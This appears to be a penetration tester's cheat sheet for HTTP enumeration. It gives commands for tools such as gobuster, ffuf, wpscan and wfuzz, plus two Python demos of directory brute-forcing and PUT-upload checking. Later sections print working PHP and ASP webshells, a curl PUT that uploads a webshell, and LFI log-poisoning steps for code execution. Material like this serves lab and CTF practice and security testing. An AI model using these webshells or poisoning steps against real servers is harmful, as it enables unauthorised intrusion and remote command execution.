# HTTP Enum

#### ***`The main thing to remember here is to always run against multiple wordlists, starting with directory-list-2.3-medium.txt`***

### Gobuster

```
# URL Search

-- Quick Directory Busting:
# -w wordlist, -t threads, -a User-Agent string. SecLists ships its web wordlists under Discovery/Web-Content (hyphen).
gobuster dir -u http://10.10.10.20 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux
gobuster dir -u http://10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux

-- Comprehensive Directory Busting
# gobuster >= 3.1 blacklists 404 by default and refuses an explicit -s list while that
# blacklist is set, so clear it with -b "" whenever you pass -s.
gobuster dir -s 200,204,301,302,307,403 -b "" -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

-- Search with File Extension
# -x appends each extension to every word, so the request count multiplies by the number of extensions.
gobuster dir -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php

==========================================================================================================================================================================================

# DNS Search (subdomain brute force via DNS lookups)
gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt

==========================================================================================================================================================================================

# vhost Search (fuzzes the Host header against one web server; with gobuster >= 3.2 add
# --append-domain so each word is sent as word.anysite.com instead of as-is)
gobuster vhost -u https://anysite.com -w common-vhosts.txt --append-domain
```

### FFUF

```
# -e appends each extension to every word; -ic skips the comment lines at the top of
# directory-list-2.3-medium.txt. If every path answers 200 with the same "not found"
# page, filter it by size (-fs <bytes>) or let ffuf measure it itself with -ac.
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
```
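To make the filtering behind the gobuster and ffuf flags above concrete (status-code match lists, extension appending, and size filtering against a catch-all page), here is an added example that is not part of the original page and not code from either tool: a small Python brute-forcer run against a constructed local HTTP server that answers every unknown path with the same 200 "not found" page. The wordlist, paths, bodies and sizes are all made up for the demo.

```python
"""Directory brute-forcing with status-code and response-size filtering.
Added demo, not gobuster/ffuf code: a constructed local HTTP server stands in
for the target so this runs offline; all paths, bodies and words are made up."""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed target: path -> (status, body). Any other path gets a "soft 404":
# status 200 with the same catch-all page, which defeats status-code matching alone.
SITE = {
    "/index.html": (200, b"<html>welcome</html>"),
    "/admin": (301, b""),
    "/backup.php": (403, b"Forbidden"),
    "/robots.txt": (200, b"User-agent: *\nDisallow: /admin\n"),
}
CATCH_ALL = b"<html><body>Page not found, sorry!</body></html>"

# Constructed wordlist; the leading "#" line mirrors the comment header of
# directory-list-2.3-medium.txt that ffuf -ic skips.
WORDLIST = ["# Copyright comment", "index", "admin", "backup", "robots", "uploads"]
EXTENSIONS = ["", ".html", ".php", ".txt"]          # like gobuster -x / ffuf -e
MATCH_CODES = {200, 204, 301, 302, 307, 401, 403}   # like gobuster -s / ffuf -mc


class DemoHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, body = SITE.get(self.path, (200, CATCH_ALL))
        self.send_response(status)
        if status == 301:
            self.send_header("Location", self.path + "/")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # report 301/302 as hits instead of following them, as the tools do


OPENER = urllib.request.build_opener(_NoRedirect)


def probe(base_url, path):
    """Request one path; return (status, body size): ffuf's code and size columns."""
    req = urllib.request.Request(base_url + path, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())


def calibrate(base_url):
    """Size of the catch-all page (what ffuf -ac measures): fetch an impossible path."""
    status, size = probe(base_url, "/calibration-zzq-9f3a7c")
    return size if status == 200 else None


def brute(base_url, words, extensions, match_codes=MATCH_CODES, filter_size=None):
    """Return [(path, status, size)] for each word x extension whose status is in
    match_codes and whose size differs from filter_size (ffuf -fs)."""
    hits = []
    for word in words:
        if not word.strip() or word.startswith("#"):
            continue
        for ext in extensions:
            path = "/" + word + ext
            status, size = probe(base_url, path)
            if status not in match_codes:
                continue
            if filter_size is not None and size == filter_size:
                continue  # same size as the catch-all page: a soft 404
            hits.append((path, status, size))
    return hits


def run_demo():
    """Brute-force the constructed server unfiltered, then with the calibrated
    size filter; return both hit lists."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), DemoHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base_url = "http://127.0.0.1:%d" % server.server_address[1]
    try:
        noisy = brute(base_url, WORDLIST, EXTENSIONS)
        clean = brute(base_url, WORDLIST, EXTENSIONS, filter_size=calibrate(base_url))
    finally:
        server.shutdown()
        server.server_close()
    return noisy, clean


if __name__ == "__main__":
    noisy, clean = run_demo()
    print("%d hits without the size filter, %d with it:" % (len(noisy), len(clean)))
    for path, status, size in clean:
        print("  %-14s %d  size=%d" % (path, status, size))
```

Without the size filter every one of the 20 word/extension combinations is reported, because the catch-all page is a 200 and 200 is in the match list; after calibrating the catch-all size only the four real paths remain. That is exactly why a status-code allowlist alone is not enough and why the tools offer `-fs`/`-ac` (ffuf) or hiding by size (wfuzz `--hh`).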

### **Nikto Web Scan**

```
nikto -h 10.10.10.10
nikto -h 10.10.10.10 -p 8080                 # Different port
nikto -h 10.10.10.10 -p 443,80,8080,8081     # Multiple ports
nikto -h 10.10.10.10 -p 80-88                # Port range
```

### Wordpress Scan

```
wpscan --update
wpscan --url http://10.10.10.10/
wpscan --url http://10.10.10.10/wp/

# wpscan 3.x syntax: --url (not -u) and a comma-separated --enumerate list, e.g.
# users, vulnerable plugins and vulnerable themes in one run:
wpscan --url http://10.10.10.10/wp/ --enumerate u,vp,vt
# Vulnerability data for vp/vt requires an API token from wpscan.com: --api-token <token>

**** User ****
u: enumerate users

**** Plugins Switches ****
p: Popular plugins only
vp: Vulnerable plugins only
ap: All plugins

**** Themes Switches ****
t: Popular themes only
vt: Vulnerable themes only
at: All themes
```

### Drupal

```
droopescan scan drupal -u http://10.10.10.10/ -t 32
```

### Joomla

```
joomscan -u http://10.10.10.10/
```

### Dirb

```
dirb http://10.10.10.x

******** HOTKEYS *******
n -> Go to the next directory.
q -> Stop scan and save current state.
r -> Remaining scan stats

dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt

-x : use this extension list against the wordlists within big.txt
```

### Dirsearch

```
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION>

Example
python3 dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
./dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

-u: URL to scan.
-e: formats to search.
-w: wordlist.
```

### Netcat

```
# Talk HTTP by hand. The port is required, and an empty line (press Enter twice)
# terminates the request; nothing comes back until the server sees it.
nc 10.10.10.10 80
HEAD / HTTP/1.0

nc 10.10.10.10 80
GET / HTTP/1.0

# HTTP/1.1 additionally requires a "Host: 10.10.10.10" header line before the blank line.
```

### cUrl

```
# Headers (-i keeps the body as well; -I sends a HEAD request and shows only the headers)
curl -i INSERTIPADDRESS

# Everything else (-L follows redirects)
curl -i -L INSERTIPADDRESS

# Title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq

# Upload possible? Look for PUT in the Allow header of the OPTIONS reply. Allow is
# advisory: a server can accept PUT without listing it, or list it and still refuse.
curl -v -X OPTIONS http://INSERTIPADDRESS/
# Then try the upload; a 201/204 followed by a GET of the same path that returns
# your content confirms it. -d sends the body as application/x-www-form-urlencoded,
# which most servers ignore for PUT; --upload-file <file> sends a file verbatim.
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php
```
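As an added example serving both the Netcat and the cUrl sections above (it is not part of the original page and not curl or netcat code), the Python script below does by hand what those lines do: it writes a raw HTTP/1.0 request to a socket, parses the response, reads the Allow header returned by OPTIONS, and when PUT is advertised uploads a harmless marker file and fetches it back to confirm the server really stores and serves what it receives. The target is a constructed local server that accepts PUT; the host, port, path `/test/shell.php` and the marker body are assumptions for the demo.

```python
"""Raw HTTP probe: OPTIONS -> Allow header -> PUT a marker -> GET it back.
Added demo, not part of the page's tooling. The WebDAV-like server below is
constructed so the script runs offline; it accepts PUT for any path."""
import socket
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class PutHandler(BaseHTTPRequestHandler):
    """Constructed target that advertises PUT and keeps uploads in memory."""
    store = {}

    def _reply(self, status, body=b"", extra=()):
        self.send_response(status)
        for name, value in extra:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, extra=[("Allow", "OPTIONS, GET, HEAD, PUT")])

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        self.store[self.path] = self.rfile.read(length)
        self._reply(201)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            self._reply(404, b"not found")
        else:
            self._reply(200, body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def raw_request(host, port, method, path, body=b""):
    """Send one hand-built HTTP/1.0 request (what you would type into nc) and
    return (status, {header: value}, body). HTTP/1.0 makes the server close the
    connection after replying, so reading until EOF yields the whole response."""
    lines = ["%s %s HTTP/1.0" % (method, path), "Host: %s:%d" % (host, port)]
    if body:
        lines.append("Content-Length: %d" % len(body))
    wire = ("\r\n".join(lines) + "\r\n\r\n").encode("ascii") + body  # blank line ends the headers
    chunks = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(wire)
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    head, _, resp_body = b"".join(chunks).partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    parsed = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        parsed[name.strip().lower()] = value.strip()
    return int(status_line.split()[1]), parsed, resp_body


def check_upload(host, port, path="/test/shell.php", marker=b"upload-check-marker"):
    """Mirror the 'Upload possible?' curl lines: read Allow from OPTIONS, then PUT a
    harmless marker (not a webshell) and GET it back to prove it is really served."""
    status, hdrs, _ = raw_request(host, port, "OPTIONS", "/")
    allowed = [m.strip().upper() for m in hdrs.get("allow", "").split(",") if m.strip()]
    result = {"options_status": status, "allow": allowed, "put_status": None, "served_back": False}
    if "PUT" not in allowed:
        return result  # Allow is only advisory; a server may still accept PUT, so also try it by hand
    put_status, _, _ = raw_request(host, port, "PUT", path, body=marker)
    result["put_status"] = put_status
    if put_status in (200, 201, 204):
        get_status, _, fetched = raw_request(host, port, "GET", path)
        result["served_back"] = get_status == 200 and fetched == marker
    return result


def run_demo():
    """Start the constructed server, run check_upload against it, return the result."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), PutHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_upload("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Uploading a neutral marker first and only then a real payload keeps the check cheap and avoids leaving a working shell behind if the upload is accepted but the GET path turns out to be different (a common WebDAV layout quirk); the `served_back` flag is what tells you the file is actually reachable, not just stored.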

### Wfuzz

```
----Simple Test----
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php

----URL testing----
# -z range,0-10 fuzzes the values 0..10; --hl 97 hides responses that have 97 lines (the "no such product" page)
wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ

----DNS fuzzing (virtual hosts via the Host header)----
# -c colour output, -f <file> saves results, -t 42 threads. --hl / --hh hide responses
# with that many lines / characters, i.e. the default vhost's page. Measure it first with
# a Host header that cannot exist, then hide that size.
wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62
```

### **Upload a PHP file**

```
In case you can upload a file, try the below. The cmd parameter can carry a reverse shell one-liner as well.

<?php echo system($_GET["cmd"]);?>

OR

<?php echo shell_exec($_GET["cmd"]);?>

Note: system() already prints the command output (the echo only repeats its last line);
shell_exec() returns it instead, so there the echo is required.
```

### WebDav

```
davtest -url http://10.10.10.10    <-- Uploads a test file per extension and reports which are accepted and which execute.
cadaver http://10.10.10.10/        <-- Interactive WebDAV client (put / get / mkcol, like an FTP session).
```

### ASP Webshell (classic ASP / VBScript)

```
<%
' Classic ASP (.asp, VBScript), not ASP.NET (.aspx): needs the WScript.Shell COM object to be available to the IIS worker.
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.ReadAll()
Response.Write(o)
%>
```

### Code Execution through HTTP/LFI

```
# Poison the web server log: connect to the web port and send the PHP as the request
# line, then press Enter twice. The server records the line in access.log as-is.
nc 10.10.10.10 80
<?php system($_GET['cmd']); ?>
==========================================================================
Then include the log through the LFI you found and pass the command in cmd
(?cmd= if it is the first query parameter, &cmd= if it follows the file parameter):
?cmd=id
&cmd=id

http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami
```

